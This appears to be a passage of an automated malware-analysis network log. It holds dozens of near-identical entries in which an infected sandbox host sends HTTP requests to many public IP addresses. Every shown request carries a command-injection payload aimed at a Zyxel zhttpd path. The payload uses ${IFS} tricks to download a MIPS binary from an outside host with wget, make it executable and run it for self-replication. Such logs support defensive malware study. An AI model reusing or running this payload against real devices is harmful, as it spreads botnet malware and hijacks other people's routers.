                                                  Jan 19, 2024 18:24:11.350904942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8090192.168.2.133429617.39.29.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350905895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8091192.168.2.1347568162.69.216.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.350950956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8092192.168.2.134422670.232.92.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351017952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8093192.168.2.1337796167.220.195.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351047039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8094192.168.2.133877893.188.124.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351057053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8095192.168.2.133898017.85.31.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351109028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8096192.168.2.1349880169.56.55.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351145029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8097192.168.2.135705620.174.203.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351176977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8098192.168.2.1353634136.18.0.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351238966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8099192.168.2.1342342145.83.6.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351272106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8100192.168.2.135583831.47.109.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351315022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8101192.168.2.1335026128.87.84.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351358891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8102192.168.2.1347232156.5.184.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351402998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8103192.168.2.1347112185.177.58.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351430893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8104192.168.2.1341032181.150.70.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351480007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8105192.168.2.133493827.1.113.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351526976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8106192.168.2.1337728194.217.34.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351571083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8107192.168.2.133952077.113.145.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351607084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8108192.168.2.1340774141.19.236.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351655006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8109192.168.2.1356906208.201.84.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351681948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8110192.168.2.1360710164.250.159.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351748943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8111192.168.2.134415866.190.69.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351803064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8112192.168.2.1352902211.29.76.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351844072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8113192.168.2.134561827.54.154.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351885080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8114192.168.2.135178436.188.161.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351910114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8115192.168.2.1359310101.218.230.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351946115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8116192.168.2.1336490191.177.149.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.351982117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8117192.168.2.133599262.22.133.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352020025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8118192.168.2.13539221.103.172.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352072954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8119192.168.2.1348762134.196.12.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352123976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8120192.168.2.134262885.139.6.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352166891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8121192.168.2.1344970172.195.216.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352189064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8122192.168.2.135907686.213.32.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352236032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8123192.168.2.134465045.200.72.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352277994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8124192.168.2.1348100144.241.117.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352341890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8125192.168.2.1360516191.249.21.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352364063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8126192.168.2.135714442.248.51.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352408886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8127192.168.2.135570092.116.223.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352441072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8128192.168.2.1343784141.190.180.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352492094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8129192.168.2.1346952108.209.51.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352516890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8130192.168.2.1360574191.140.197.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352550030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8131192.168.2.1342722145.18.149.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352576971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8132192.168.2.134297848.221.64.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352624893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8133192.168.2.1346524131.0.106.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352668047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8134192.168.2.1340636119.206.64.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352704048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8135192.168.2.1359896132.158.52.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352757931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8136192.168.2.1352192128.187.236.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352782011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8137192.168.2.1360166200.176.245.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352824926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8138192.168.2.134019814.87.0.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352858067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8139192.168.2.133765245.105.142.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352890015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8140192.168.2.1334966104.105.43.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352916002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8141192.168.2.133865234.107.138.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352936983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8142192.168.2.135271648.143.187.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.352986097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8143192.168.2.135182088.66.167.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353039980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8144192.168.2.135660439.3.136.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353070021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8145192.168.2.1345780112.187.224.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353130102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8146192.168.2.1346186153.66.16.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353167057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8147192.168.2.13524269.247.66.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353210926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8148192.168.2.1353260160.223.165.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353244066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8149192.168.2.1356552115.31.252.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353281021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8150192.168.2.1352990142.206.250.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353329897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8151192.168.2.1354198135.150.152.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353360891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8152192.168.2.1336632112.107.128.245443
                                                  TimestampBytes transferredDirectionData
